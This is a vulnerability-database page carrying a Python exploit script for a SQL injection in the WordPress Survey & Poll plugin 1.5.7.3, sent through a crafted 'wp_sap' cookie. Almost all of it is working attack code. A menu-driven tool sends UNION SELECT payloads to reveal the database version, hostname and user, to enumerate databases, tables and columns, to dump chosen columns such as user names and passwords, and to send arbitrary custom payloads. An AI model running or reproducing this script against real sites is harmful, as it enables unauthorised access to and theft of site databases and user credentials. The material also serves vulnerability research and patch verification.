Vulners
Lucene search
WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Date: 2021-09-07
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: MariaDB,MYSQL
#!/usr/bin/python3
import requests
import re
import warnings
from bs4 import BeautifulSoup, CData
import sys
import argparse
import os
import time
from termcolor import colored
import validators
#Install all the requirements
"""
pip3 install requests
pip3 install bs4
pip3 install argparse
pip3 install termcolor
pip3 install validators
"""
parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)')
parser.add_argument('-u',help='Poll & Survey page URL')
args = parser.parse_args()
url = args.u
if len(sys.argv) !=3:
parser.print_help(sys.stderr)
sys.exit()
if not validators.url(url):
print(colored("\r\nEnter URL with http:// or https://\r\n",'red'))
parser.print_help(sys.stderr)
sys.exit()
def currect_db_name():
payload= """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]"""
inject(payload)
def db_version():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]"""
inject(payload)
def hostname():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]"""
inject(payload)
def current_user():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]"""
inject(payload)
def list_databases():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]"""
inject(payload)
def list_tables_db():
db = input("\r\nDatabase : ")
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='%s'#"]""" %(db)
inject(payload)
def list_columns_db():
db = input("\r\nDatabase : ")
table = input("Table : ")
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='%s' and table_name='%s'#"]""" %(db,table)
inject(payload)
def dump_db():
db = input("\r\nDatabase: ")
table = input("Table: ")
column = input("Columns Eg: users,password : ")
dump = "%s.%s" %(db,table)
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(%s),11 from %s.%s#"]""" %(column,db,table)
inject(payload)
def custom_payload():
payload = input("\r\nPayload : ")
inject(payload)
def inject(inject_payload):
request = requests.Session()
cookies = {
'wp_sap': inject_payload,
}
print("\r\n"+colored("Sending Payload :",'red')+" %s\r\n" %colored((inject_payload),'green'))
response = request.get(url,cookies=cookies)
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
soup = BeautifulSoup(response.text,features="lxml")
cdata = soup.find(text=re.compile("CDATA"))
split_cdata = list(cdata.split(':'))
output = split_cdata[11]
print("\r\n"+colored("SQLI OUTPUT :",'red')+" %s\r\n" %colored((output),'green'))
time.sleep(1)
main()
def main():
print ("Automated SQL Injector (wp-survey-and-poll)")
print ("Enter the respective number to select option")
print ("#EXAMPLE Option : 1\r\n")
print("Option 1 : Grab Database Version")
print("Option 2 : Get Current Database Name")
print("Option 3 : Get Hostname ")
print("Option 4 : Get Current User")
print("Option 5 : List All Databases")
print("Option 6 : List Tables From Database")
print("Option 7 : List Columns from Tables")
print("Option 8 : Dump Database")
print("Option 9 : Custom Payload")
print("Option 10 : Exit")
print("\r\n")
option_selected = str(input("Select Option : "))
if(option_selected=="1"):
db_version()
if(option_selected=="2"):
currect_db_name()
if(option_selected=="3"):
hostname()
if(option_selected=="4"):
current_user()
if(option_selected=="5"):
list_databases()
if(option_selected=="6"):
list_tables_db()
if(option_selected=="7"):
list_columns_db()
if(option_selected=="8"):
dump_db()
if(option_selected=="9"):
custom_payload()
if(option_selected=="10"):
sys.exit()
else:
main()
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Sep 2021 00:00Current
7.4High risk
Vulners AI Score7.4